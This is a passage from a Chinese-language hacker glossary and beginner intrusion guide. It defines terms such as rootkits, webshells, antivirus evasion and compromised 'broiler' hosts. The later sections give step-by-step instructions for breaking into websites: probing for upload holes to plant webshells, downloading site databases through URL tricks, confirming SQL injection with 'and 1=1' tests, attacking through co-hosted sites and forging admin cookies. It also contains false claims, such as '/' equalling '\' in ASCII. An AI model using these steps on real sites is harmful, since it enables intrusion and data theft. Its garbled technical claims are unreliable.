Horse)程序都可以被入侵者用语制作后门(BackDoor)**6.rootkit:**rootkit是攻击者用来隐藏自己的行踪和保留root(根权限,可以理解成WINDOWS下的system或者管理员权限)访问权限的工具。通常,攻击者通过远程攻击的方式获得root访问权限,或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限,进入系统后,再通过,对方系统内存在的安全漏洞获得系统的root权限。然后,攻击者就会在对方的系统中安装rootkit,以达到自己长久控制对方的目的,rootkit与我们前边提到的木马和后门很类似,但远比它们要隐蔽,黑客守卫者就是很典型的rootkit,还有国内的ntroorkit等都是不错的rootkit工具。**7.IPC$:**是共享“命名管道”的资源,它是为了让进程间通信而开放的饿命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计**算机和查看计算机的共享资源时使用。**8.弱口令:**指那些强度不够,容易被猜解的,类似123,abc这样的口令(密码)**9.默认共享:**默认共享是WINDOWS2000/XP/2003系统开启共享服务时自动开启所有硬盘的共享,因为加了"$"符号,所以看不到共享的托手图表,也成为隐藏共享。**10.shell:**指的是一种命令指行环境,比如我们按下键盘上的“开始键+R”时出现“运行”对话框,在里面输入“cmd”会出现一个用于执行命令的黑窗口,这个就是WINDOWS的Shell执行环境。通常我们使用远程溢出程序成功溢出远程电脑后得到的那个用于执行系统命令的环境就是对方的shell**11.WebShell:**WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做是一种网页后门。黑客在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,好后就可以使用浏览器来访问这些asp 或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。可以上传下载文件,查看数据库,执行任意程序命令等。国内常用的WebShell有海阳ASP木马,Phpspy,c99shell等**12.溢出:**确切的讲,应该是“缓冲区溢出”。简单的解释就是程序对接受的输入数据没有执行有效的检测而导致错误,后果可能是造成程序崩溃或者是执行攻击者的命令。大致可以分为两类:(1)堆溢出;(2)栈溢出。**13.注入:**随着B/S模式应用开发的发展,使用这种模式编写程序的程序员越来越来越多,但是由于程序员的水平参差不齐相当大一部分应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想要知的数据,这个就是所谓的SQLinjection,即:SQL注入。**14.注入点:**是可以实行注入的地方,通常是一个访问数据库的连接。根据注入点数据库的运行帐号的权限的不同,你所得到的权限也不同。**15.内网:**通俗的讲就是局域网,比如网吧,校园网,公司内部网等都属于此类。查看IP地址如果是在以下三个范围之内的话,就说明我们是处于内网之中的:10.0.0.0—10.255.255.255,172.16.0.0—172.31.255.255,192.168.0.0—192.168.255.255**16.外网:**直接连入INTERNET(互连网),可以与互连网上的任意一台电脑互相访问,IP地址不是保留IP(内网)IP地址。**17.端口:**(Port)相当于一种数据的传输通道。用于接受某些数据,然后传输给相应的服务,而电脑将这些数据处理后,再将相应的恢复通过开启的端口传给对方。一般每一个端口的开放的偶对应了相应的服务,要关闭这些端口只需要将对应的服务关闭就可以了。**18.** 3389、4899肉鸡:**3389是Windows终端服务(Terminal Services)所默认使用的端口号,该服务是微软为了方便网络管理员远程管理及维护服务器而推出的,网络管理员可以使用远程桌面连接到网络上任意一台开启了终端服务的计算机上,成功登陆后就会象操作自己的电脑一样来操作主机了。这和远程控制软件甚至是木马程序实现的功能很相似,终端服务的连接非常稳定,而且任何杀毒软件都不会查杀,所以也深受黑客喜爱。黑客在入侵了一台主机后,通常都会想办法先添加一个属于自己的后门帐号,然后再开启对方的终端服务,这样,自己就随时可以使用终端服务来控制对方了,这样的主机,通常就会被叫做3389肉鸡。Radmin是一款非常优秀的远程控制软件,4899就是Radmin默认使用也经常被黑客当作木马来使用(正是这个原因,目前的杀毒软件也对Radmin查杀了)。有的人在使用的服务端口号。因为Radmin的控制功能非常强大,传输速度也比大多数木马快,而且又不被杀毒软件所查杀,所用Radmin管理远程电脑时使用的是空口令或者是弱口令,黑客就可以使用一些软件扫描网络上存在Radmin空口令或者弱口令的主机,然后就可以登陆上去远程控制对恶劣,这样被控制的主机通常就被成做4899肉鸡。**19.免杀:**就是通过加壳、加密、修改特征码、加花指令等等技术来修改程序,使其逃过杀毒软件的查杀。**20.加壳:**就是利用特殊的算法,将EXE可执行程序或者DLL动态连接库文件的编码进行改变(比如实现压缩、加密),以达到缩小文件体积或者加密程序编码,甚至是躲过杀毒软件查杀的目的。目前较常用的壳有UPX,ASPack、PePack、PECompact、UPack、免疫007、木马彩衣等等。**21.花指令:**就是几句汇编指令,让汇编语句进行一些跳转,使得杀毒软件不能正常的判断病毒文件的构造。说通俗点就是”杀毒软件是从头到脚按顺序来查找病毒。如果我们把病毒的头和脚颠倒位置,杀毒软件就找不到病毒了。**什么是TCP/IP**是一种网络通信协议,他规范了网络上所有的通信设备,尤其是一个主机与另一个主机之间的数据往来格式以及传送方式.,TCP/IP是INTERNET的基础协议,也是一种电脑数据打包和寻址的标准方法.在数据传诵中,可以形象地理解为两个信封,TCP和IP就像是信封,要传递的信息被划为若干段,**每一段塞入一个TCP信封,并在该信封面上记录有分段号的信息,再将TCP信封塞入IP大信封,发送上网.**什么是路由器**路由器应该是在网络上使用最高的设备之一了,它的主要作用就是路由选路,将IP数据包正确的送到目的地,因此也叫IP路由器.**什么是蜜罐**好比是情报收集系统.蜜罐好象是故意让人攻击的目标,引诱黑客来攻击,所有攻击者入侵后,你就可以知道他是如何得逞的,随时了解针对你的服**务器发动的最新的攻击和漏洞.还可以通过窃听黑客之间的联系,收集黑客所用的种种工具,并且掌握他们的社交网络.**什么是拒绝服务攻击**DOS是DENIALOFSERVICE的简称,即拒绝服务,造成DOS的攻击行为被称为DOS攻击,其目的是使计算机或网络无法正常服务,最常见的DOS攻击有计算机网络宽带攻击和连通性攻击,连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源被消耗,最终计算机无法再处理合法用户的请求.**什么是脚本注入攻击(SQLINJECTION)**所谓脚本注入攻击者把SQL命令插入到WEB表单的输入域或也面请求的查学字符串,欺骗服务器执行恶意的SQL命令,在某些表单中,用户输入的内容直接用来构造动态的SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击.**什么是防火墙?它是如何确保网络安全的**使用防火墙(Firewall)是一种确保网络安全的方法。防火墙是指设置在不同网络(如可信任的企业内部网和不可信的公共网)或网络安全域之间的一系列部件的组合。它是不同网络或网络安全域之间信息的惟一出入口,能根据企业的安全政策控制(允许、拒绝、监测)出入网络的信息流,且本身具有较强的抗攻击能力。它是提供信息安全服务,实现网络和信息安全的基础设施。**什么是后门?为什么会存在后门?**后门(BackDoor)是指一种绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在软件之前没有删除,那么它就成了安全隐患。**什么叫入侵检测**入侵检测是防火墙的合理补充,帮助系统对付网络攻击,扩展系统管理员的安全管理能力(包括安全审计、监视、进攻识别和响应),提高信息安全基础结构的完整性。它从计算机网络系统中的若干关键点收集信息,并分析这些信息,检查网络中是否有违反安全策略的行为和遭到袭击的迹象**什么叫数据包监测,它有什么作用**数据包监测可以被认为是一根窃听电话线在计算机网络中的等价物。当某人在“监听”网络时,他们实际上是在阅读和解释网络上传送的数据包。如果你需要在互联网上通过计算机发送一封电子邮件或请求下载一个网页,这些操作都会使数据通过你和数据目的地之间的许多计算机。这些传输信息时经过的计算机都能够看到你发送的数据,而数据包监测工具就允许某人截获数据并且查看它。在这里值得一题的是,美国的落山基级骇动力潜艇就有几艘专们用于海底电缆的数据监听。特别是太平洋。**什么是NIDS**NIDS是NetworkIntrusionDetectionSystem的缩写,即网络入侵检测系统,主要用于检测Hacker或Cracker**通过网络进行的入侵行为。NIDS的运行方式有两种,一种是在目标主机上运行以监测其本身的通信信息,另一**种是在一台单独的机器上运行以监测所有网络设备的通信信息,比如Hub、路由器。**什么叫SYN包**TCP连接的第一个包,非常小的一种数据包。SYN攻击包括大量此类的包,由于这些包看上去实际不存在的**站点,因此无法有效进行处理。**加密技术是指什么**加密技术是最常用的安全保密手段,利用技术手段把重要的数据变为乱码(加密)传送,到达目的地后再**用相同或不同的手段还原(解密)。**加密技术包括两个元素:算法和密钥。算法是将普通的信息或者可以理解的信息与一串数字(密钥)结合**,产生不可理解的密文的步骤,密钥是用来对数据进行编码和解密的一种算法。在安全保密中,可通过适当的**钥加密技术和管理机制来保证网络的信息通信安全。**局域网内部的ARP攻击是指什么**ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。**基于ARP协议的这一工作特性,黑客向对方计算机不断发送有欺诈性质的ARP数据包,数据包内包含有与当**前设备重复的Mac地址,使对方在回应报文时,由于简单的地址重复错误而导致不能进行正常的网络通信。一般**情况下,受到ARP攻击的计算机会出现两种现象:**1.不断弹出“本机的XXX段硬件地址与网络中的XXX段地址冲突”的对话框。**2.计算机不能正常上网,出现网络中断的症状。**因为这种攻击是利用ARP请求报文进行“欺骗”的,所以防火墙会误以为是正常的请求数据包,不予拦截**。因此普通的防火墙很难抵挡这种攻击。**什么叫欺骗攻击?它有哪些攻击方式**网络欺骗的技术主要有:HONEYPOT和分布式HONEYPOT、欺骗空间技术等。主要方式有:IP欺骗、ARP欺骗、**DNS欺骗、Web欺骗、电子邮件欺骗、源路由欺骗(通过指定路由,以假冒身份与其他主机进行合法通信或发送**假报文,使受攻击主机出现错误动作)、地址欺骗(包括伪造源地址和伪造中间站点)等。**嗅探**计算机网络的共享通讯道的,支持每对通讯计算机独占通道的交换机/集线器仍然过于昂贵,共享意为着**计算机能够接收到发送给其他计算机的信息,捕获在网络中传输的数据信息就称为嗅探.**木马**全称为特洛伊木马(TrojanHorse),是根据希腊神话传说中一次战争而得名。麦尼劳斯派兵讨伐特洛伊国**王,他们假装打败,然后留下一个大木马,而木马里却藏着最强悍的勇士!最后等晚上时间一到,木马里的勇**士就冲出来把敌人打败了。这就是后来的”木马计”,而黑客中的木马有点后门的意思,就是把预谋的功能隐**藏在公开的功能里,掩饰真正的企图。**肉鸡**已经被攻击了,对其具有控制权的主机。**跳板**一个具有辅助作用的机器,利用这个主机作为一个间接工具,来入侵其他主机,一般和肉鸡连用。**弱口令**所谓弱口令也就是指密码与用户名相同,密码为空的用户名与密码组合,也包括那些密码强度不够,容易**被猜解的组合,一般专业认识不会犯这种错误。**权限**计算机用户对于文件及目录的建立,修改,删除以及对于某些服务的访问,程序的执行,是以权限的形式**来严格区分的.被赋予了相应的权限,就可以进行相应的操作,否则就不可以.**溢出**程序在处理我们提交给它的数据时,有的时候忘了检查数据的大小与合法性,那么这些数据可能会超过属**于自己的地盘,覆盖到其它数据的盘.如果这些超长数据被精心的策划构造的话,可能会被黑客去执行任意命令**.打个比喻来说,windows系统是一个人,会一杯一杯喝我们给它准备的水,其中有一个杯子太小了,我们倒入**了大量的水它就会溢出到别的杯子里去,而溢出到别的杯子里的东西我们事先可以设计好,而系统并不知道,**这以为这本来就是那个杯子里的东西,于是我们可以完成一定的任务.**端口**要网络上,知道一台电脑的ip地址,只是相当于知道了它的居住地址,要和它进行通信,我们还要知道它**开了哪些端口,比如说我们到一家医院,挂号要到1号窗口,划价要到2号窗口,取药要到3号窗口.那么与计算**机的通信也是一样的,要上qq,你得登陆到腾讯服务器的8000端口,要浏览x档案的论坛,你得与其80端口进行**联系,要ftp登陆空间,传输文件,我们又得服务器的21端口连接了.可以说,端口就是一种数据的传输通道,**用于接收某些数据,然后传给相应的服务,而电脑将这些数据处理后,再将相应的回复通过端口传给对方.**ip地址**inter上的电脑有许多,为了让他们能够相互识别,inter上的每一台主机都分配有一个唯一的32位地址,该地址称为ip地址,也称作网际地址,ip地址由4个数值部分组成,每个数值部分可取值0-255,各部分之间用一个‘.‘分开.**ARP**地址解析协议(AddressResolutionProtocol)**此协议将网络地址映射到硬件地址。**RARP**反向地址解析协议(ReverseAddressResolutionProtocol)**此协议将硬件地址映射到网络地址**UDP**用户数据报协议(UserDatagramProtocol)**这是提供给用户进程的无连接协议,用于传送数据而不执行正确性检查。**FTP**文件传输协议(FileTransferProtocol)**允许用户以文件操作的方式(文件的增、删、改、查、传送等)与另一主机相互通信。**SMTP**简单邮件传送协议(SimpleMailTransferProtocol)**SMTP协议为系统之间传送电子邮件。**TELNET**终端协议(TelTerminalProcotol)**允许用户以虚终端方式访问远程主机**HTTP**超文本传输协议(HypertextTransferProcotol)**TFTP**简单文件传输协议(TrivialFileTransferProtocol)**Shell**Shell就是系统于用户的交换式界面。简单来说,就是系统与用户的一个沟通环境,我们平时用到的DOS就是一个Shell(Win2K或cmd.exe)。**Root**Unix里最高权限的用户,也就是超级管理员。**Admin**WindowsNT/2K/XP里最高权限的用户,也就是超级管理员。**Rootshell**通过一个溢出程序,在主机溢出一个具有Root权限的Shell。**Exploit**溢出程序。Exploit里通常包含一些Shellcode。**Shellcode**溢出攻击要调用的函数,溢出后要一个交换式界面进行操作。所以说就有了Shellcode。**AccesControllist(ACL)**访问控制列表。**AddressResolutionProtocol(ARP)**地址解析协议。**Administratoraccount**管理员帐号。**ARPANET**阿帕网(Inter的简称)。**accesstoken**访问令牌。**adaptivespeedleveling**自适应速度等级调整。**algorithm**算法alias别名。**anlpasswd**一种与PASSWD+相似的代理密码检查器。**applicatlons**应用程序异步传递模式。**accoutlockout**帐号封锁。**accoutpolicies**记帐策略。**accounts**帐号。**adapter**适配器。

**上传漏洞**这个漏洞在DVBBS6.0时代被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的入侵中上传漏洞也是常见的漏洞。**怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示“上传格式不正确[重新上传]”这样的字样就是有上传漏洞了,找个可以上传的工具**直接可以得到WEBSHELL。**工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。

**WEBSHELL是什么:**其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB木马的朋友可能知道(比如老兵的站长助手就是WEB木马,海阳2006也是WEB木马)。我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。

**暴库**这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。

**暴库方法:** 比如一个站的地址为http://www.xxx.com/dispbbs.asp?boardID=7&ID=161,我门就可以把com/dispbbs中间的/换成\,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。** 还有种方法就是利用默认的数据库路径http://www.xxx.com/后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成\)。** 为什么换成\:因为在ASCII码里/等于\,有时碰到数据库名字为/#abc.mdb的为什么下不了?这里需要把#号换成#就可以下载了,为什么我暴出的数据库文件是以.ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB这样就可以下载了如果还下载不了可能作了防下载。

**注入漏洞**这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。**怎样利用:**我先介绍下怎样找漏洞比如这个网址http://www.xxx.com/dispbbs.asp?boardID=7&ID=161后面是以ID=数字形式结尾的站我们可以手动在后面加上个and1=1看看**如果显示正常页面再加上个and1=2来看看如果返回正常页面说明没有漏洞如果返回错误页面说明存在注入漏洞。如果加and1=1返回错误页面说明也没有漏洞,知道了站点有没有漏洞我们就可以利用手工来猜解也可以用工具现在工具比较多(NBSI、NDSI、啊D、DOMAIN等),都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。

**旁注**我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们要入侵的站点。**打个形象的比喻,比如你和我一个楼,我家很安全,而你家呢,却漏洞百出,现在有个贼想入侵我家,他对我家做了监视(也就是扫描),发现没有什么可以利用的东西,那么这个贼发现你家和我家一个楼,你家很容易就进去了,他可以先进入你家,然后通过你家得到整个楼的钥匙(系统权限),这样就自然得到我的钥匙了,就可以进入我的家(网站)。

**工具介绍:**还是名小子的DOMIAN3.5不错的东西,可以检测注入,可以旁注,还可以上传!

**COOKIE诈骗**许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。**怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了,但是破解不出来密码(MD5是加密后的一个16位的密码)。我们就可以用**COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。

**防火墙系统:**IDS入侵检测——现在一般有成品软件卖

**时间戳** “时间戳”是个听起来有些玄乎但实际上相当通俗易懂的名词,我们查看系统中的文件属性,其中显示的创建、修改、访问时间就是该文件的时间戳。** 对于大多数一般用户而言,通过修改“时间戳”也许只是为了方便管理文件等原因而掩饰文件操作记录。但对于应用数字时间戳技术的用户就并非这么“简单”了,这里的“时间戳”(time-stamp)是一个经加密后形成的凭证文档,是数字签名技术的一种变种应用。*** 在电子商务交易文件中,利用数字时间戳服务(DTS:digita1timestampservice)能够对提供电子文件的日期和时间信息进行安全保护,以防止被商业对手等有不良企图的人伪造和串改的关键性内容。

**MySQL数据库** 我们在黑客文章中常会看到针对“MySQL数据库”的攻击,但很多朋友却对其不大了解。“MySQL数据库”之所以应用范围如此广泛,是由于它是一款免费的开放源代码的多用户、多线程的跨平台关系型数据库系统,也可称得上是目前运行速度最快的SQL语言数据库。

** “MySQL数据库”提供了面向C、C++、Java等编程语言的编程接口,尤其是它与PHP的组合更是黄金搭档。“MySQL数据库”采用的是客户机/服务器结构的形式,它由一个服务器守护程序Mysqld和很多不同的客户程序和库组成。但若是配置不当,“MySQL数据库”就可能会受到攻击,例如若是设置本地用户拥有对库文件读权限,那么入侵者只要获取“MySQL数据库”的目录,将其复制本机数据目录下就能访问进而窃取数据库内容。

**MD5验证**MD5(全称是message-digestalgorithm5)的作用是让大容量信息在用数字签名软件签署私人密匙前被“压缩”为一种保密的格式。它的典型应用是对一段信息(message)产生信息摘要(message-digest),以防止被篡改。通俗地说MD5码就是个验证码,就像我们的个人身份证一样,每个人的都是不一样的。MD5码是每个文件的唯一校验码(MD5不区分大小写,但由于MD5码有128位之多,所以任意信息之间具有相同MD5码的可能性非常之低,通常被认为是不可能的),凭借此特性常被用于密码的加密存储、数字签名及文件完整性验证等功能。通过MD5验证即可检查文件的正确性,例如可以校验出下载文件中是否被捆绑有其它第三方软件或木马、后门(若是校验结果不正确就说明原文件已被人擅自串改)。

**ICMP协议**ICMP(全称是InterControlMessageProtocol,即Inter控制消息协议)用于在IP主机、路由器之间传递控制消息,包括网络通不通、主机是否可达、路由是否可用等网络本身的消息。例如,我们在检测网络通不通时常会使用Ping命令,Ping执行操作的过程就是ICMP协议工作的过程。“ICMP协议”对于网络安全有着极其重要的意义,其本身的特性决定了它非常容易被用于攻击网络上的路由器和主机。例如,曾经轰动一时的海信主页被黑事件就是以ICMP攻击为主的。由于操作系统规定ICMP数据包最大尺寸不超过64KB,因而如果向目标主机发送超过64KB上限的数据包,该主机就会出现内存分配错误,进而导致系统耗费大量的资源处理,疲于奔命,最终瘫痪、死机。

**WAP攻击**黑客们在网络上疯狂肆虐之后,又将“触角”伸向了WAP(无线应用协议的英文简写),继而WAP成为了他们的又一个攻击目标。“WAP攻击”主要是指攻击WAP服务器,使启用了WAP服务的手机无法接收正常信息。由于目前WAP无线网络的安全机制并非相当严密,因而这一领域将受到越来越多黑客的“染指”。现在,我们使用的手机绝大部分都已支持WAP上网,而手机的WAP功能则需要专门的WAP服务器来支持,若是黑客们发现了WAP服务器的安全漏洞,就可以编制出针对该WAP服务器的病毒,并对其进行攻击,从而影响到WAP服务器的正常工作,使WAP手机无法接收到正常的网络信息。